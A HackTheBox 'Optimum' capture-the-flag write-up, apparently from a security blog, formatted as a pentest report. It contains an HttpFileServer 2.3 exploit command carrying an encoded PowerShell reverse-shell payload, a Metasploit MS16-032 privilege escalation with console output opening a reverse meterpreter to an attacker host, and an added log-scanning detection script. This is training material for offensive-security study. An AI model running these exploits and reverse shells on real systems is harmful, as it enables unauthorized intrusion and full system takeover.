Optimum CTF Writeup
This is a writeup presented by Behind Security as part of the Road to OSCP series, focusing on the Optimum CTF from HackTheBox. The writeup takes the form of a pentest report.
Optimum CTF
Optimum is a beginner-level machine which mainly focuses on enumeration of services with known exploits.
HackTheBox
Hack The Box gives individuals, businesses and universities the tools they need to continuously improve their cybersecurity capabilities — all in one place.
Executive Summary
Introduction
This document shows the results of a security assessment performed on the Optimum machine (IP: 10.10.10.8). The report provides a comprehensive analysis of the findings, including vulnerability explanations, severity ratings, and steps to reproduce the identified vulnerabilities.
Objective
The assessment sought to identify vulnerabilities that could potentially lead to unauthorized access, data compromise, or privilege escalation. By conducting controlled exploitation scenarios, the assessment aimed to highlight the impact of these vulnerabilities and provide actionable recommendations for remediation.
Requirements
The assessment was conducted with the following requirements in mind:
- Exploit vulnerabilities to demonstrate potential impact.
- Assess the effectiveness of access controls and authentication mechanisms.
- Demonstrate privilege escalation from user-level to root.
- Provide detailed vulnerability explanations, severity ratings, and remediation recommendations.
High-Level Summary
The assessment uncovered concerning vulnerabilities within the Optimum machine:
- CVE-2014-6287 (HttpFileServer RCE) - Severity: High
  - Explanation: Remote Code Execution (RCE) vulnerability identified in HttpFileServer version 2.3.
  - Recommendation: Update to the latest version of HttpFileServer to mitigate the risk.
- MS16-032 (Privilege Escalation) - Severity: Extreme
  - Explanation: Local privilege escalation vulnerability discovered, allowing a low-privileged user to obtain SYSTEM-level access.
  - Recommendation: Apply the Microsoft patch for this issue to fix this critical vulnerability.
This high-level summary outlines the vulnerabilities found during the penetration test, along with their respective severity levels. It underscores the importance of promptly addressing and remedying these vulnerabilities to enhance overall system security.
Detailed Findings
Detailed vulnerability explanations, fixes, severity ratings, and steps to reproduce the identified vulnerabilities are documented in the "Independent Challenge" section.
Methodology
Behind Security's penetration test followed a comprehensive and structured methodology, incorporating the following key phases:
Reconnaissance: The initial phase involved identifying open ports on the target and gathering information about the services behind them.
Enumeration: In this phase, Behind Security conducted an in-depth enumeration of the target system, identifying exposed services, web server directories, and potential entry points for further analysis.
Vulnerability Assessment: Automated scanning tools and manual techniques were employed to identify potential security vulnerabilities in the web application and server configuration.
Exploitation: Vulnerabilities that posed significant risks were further exploited to verify their impact on the system's security.
Post-Exploitation: In the final phase, Behind Security attempted to escalate privileges and gain deeper access to the system, simulating real-world attack scenarios.
Color Legend
Console color legend:
Standard console text
Commands inputted by the pentester
Text that we want to highlight
{...} Abbreviated output for brevity
Independent Challenge - 10.10.10.8
export IP=10.10.10.8
Service Enumeration
| IP Address | Ports Open |
| --- | --- |
| 10.10.10.8 | TCP: 80 |
Command: nmap -sC -sV -T4 -vv -p- 10.10.10.8
Initial Access - HttpFileServer 2.3 RCE
Vulnerability Explanation: The vulnerability is tracked as CVE-2014-6287, a remote code execution (RCE) vulnerability in HttpFileServer version 2.3.
Vulnerability Fix: The vendor released an updated version of HttpFileServer that patches the RCE vulnerability. Upgrade to the latest version to mitigate the risk.
Severity: High
Steps to Reproduce the Attack:
- Download the public exploit (49125.py).
- Go to revshells.com, select PowerShell #3 (Base64), change the IP address at the top to your VPN IP address, and copy the generated payload.
- Run the following command to obtain a foothold on the machine, replacing the string after `-e` with your base64-encoded payload from revshells.com:
python3 49125.py 10.10.10.8 80 "powershell.exe -e JABjAGwAaQBlAG4AdAAgAD0AIABOA{abbreviated}GwAbwBzAGUAKAApAA=="
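As an added defender-side example (not part of the original writeup), the following Python scans constructed access-log lines for the request pattern associated with this HttpFileServer 2.3 flaw: the log layout, client addresses and search strings are assumptions made for the demonstration.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log lines (not captured from the target); layout is
# "date time client method uri status"; clients and search strings are invented.
SAMPLE_LOG = """\
2023-08-12 15:10:01 10.10.14.3 GET /?search=quarterly+report 200
2023-08-12 15:10:04 10.10.14.3 GET /files/readme.txt 200
2023-08-12 15:10:07 10.10.14.3 GET /?search=%00{.test.} 200
2023-08-12 15:10:09 10.10.14.5 GET /?search=%7B.test.%7D 200
2023-08-12 15:10:12 10.10.14.7 GET /?search=notes%00 200
"""

LINE_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (\S+) (\d{3})$")
# HFS macro opener; HFS 2.3's marker filter is bypassed when %00 precedes it (CVE-2014-6287).
MACRO_OPENER = "{."


def classify_uri(uri: str) -> Optional[Tuple[str, str]]:
    """Return (severity, reason) if the request looks suspicious, else None."""
    query = urlsplit(uri).query
    # parse_qsl percent-decodes values, so an encoded %00 shows up as '\x00'.
    for name, value in parse_qsl(query, keep_blank_values=True):
        has_nul, has_macro = "\x00" in value, MACRO_OPENER in value
        if has_nul and has_macro:
            return ("high", f"NUL byte plus macro opener in '{name}' (CVE-2014-6287 pattern)")
        if has_macro:
            return ("medium", f"macro opener in '{name}'")
        if has_nul:
            return ("low", f"NUL byte in '{name}'")
    return None


def scan(log_text: str) -> List[Tuple[str, str, str, str]]:
    """Return (severity, client, uri, reason) for every suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # line does not match the assumed layout
        _ts, client, _method, uri, _status = m.groups()
        verdict = classify_uri(uri)
        if verdict:
            hits.append((verdict[0], client, uri, verdict[1]))
    return hits

if __name__ == "__main__":
    for severity, client, uri, reason in scan(SAMPLE_LOG):
        print(f"[{severity:6}] {client} {uri} -> {reason}")
```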
Post-Exploitation
LPE to SYSTEM
Vulnerability Explanation: After generating a malicious Windows executable to establish a Meterpreter session on the victim, Behind Security ran the Metasploit local exploit suggester module (post/multi/recon/local_exploit_suggester), which identified the machine as vulnerable to MS16-032, a local privilege escalation vulnerability.
Vulnerability Fix: Microsoft has issued a patch to fix this known issue. You can learn more about the patch and its details on Microsoft's official website.
Severity: Extreme
Steps to Reproduce the Attack: The attacker needs to have a meterpreter session on the machine.
- Background the meterpreter session using the command: bg
- Run: use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
- Configuration and output are provided below.
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > options
Module options (exploit/windows/local/ms16_032_secondary_logon_handle_privesc):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.10 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x86
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LHOST ATTACKER-IP
LHOST => ATTACKER-IP
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set SESSION 2
SESSION => 2
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run
[*] Started reverse TCP handler on ATTACKER-IP:4444
[+] Compressed size: 1160
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\gfJYTJhM.ps1...
[*] Compressing script contents...
[+] Compressed size: 3745
[*] Executing exploit script...
__ __ ___ ___ ___ ___ ___ ___
| V | _|_ | | _|___| |_ |_ |
| |_ |_| |_| . |___| | |_ | _|
|_|_|_|___|_____|___| |___|___|___|
[by b33f -> @FuzzySec]
[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 2380
[*] Sniffing out privileged impersonation token..
[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[ref] cannot be applied to a variable that does not exist.
At line:200 char:3
+ $iD6g = [Ntdll]::NtImpersonateThread($mgn, $mgn, [ref]$p8yG)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (p8yG:VariablePath) [], RuntimeException
+ FullyQualifiedErrorId : NonExistingVariableReference
[!] NtImpersonateThread failed, exiting..
[+] Thread resumed!
[*] Sniffing out SYSTEM shell..
[>] Duplicating SYSTEM token
Cannot convert argument "ExistingTokenHandle", with value: "", for "DuplicateToken" to type "System.IntPtr": "Cannot convert null to type "System.IntPtr"."
At line:259 char:2
+ $iD6g = [Advapi32]::DuplicateToken($iF, 2, [ref]$gYZ)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodException
+ FullyQualifiedErrorId : MethodArgumentConversionInvalidCastArgument
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!
iX7rWHCXEXxPf38Tph4mU5nNNfoW2lnc
[+] Executed on target machine.
[*] Sending stage (175686 bytes) to 10.10.10.8
[*] Meterpreter session 3 opened (ATTACKER-IP:4444 -> 10.10.10.8:49210) at 2023-08-12 11:13:08 -0400
[+] Deleted C:\Users\kostas\AppData\Local\Temp\gfJYTJhM.ps1
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeLockMemoryPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTcbPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
meterpreter > getsystem
[-] Already running as SYSTEM
Conclusion
We hope you have found our content useful and invite you to explore more of our website to discover other interesting topics we cover. From cybersecurity to programming, we strive to provide our readers with the latest and most relevant information that can help them stay informed and ahead of the curve. We are committed to providing the best user experience to you and are open to feedback and suggestions through our contact form. Thank you for choosing Behind Security, we hope to see you again soon!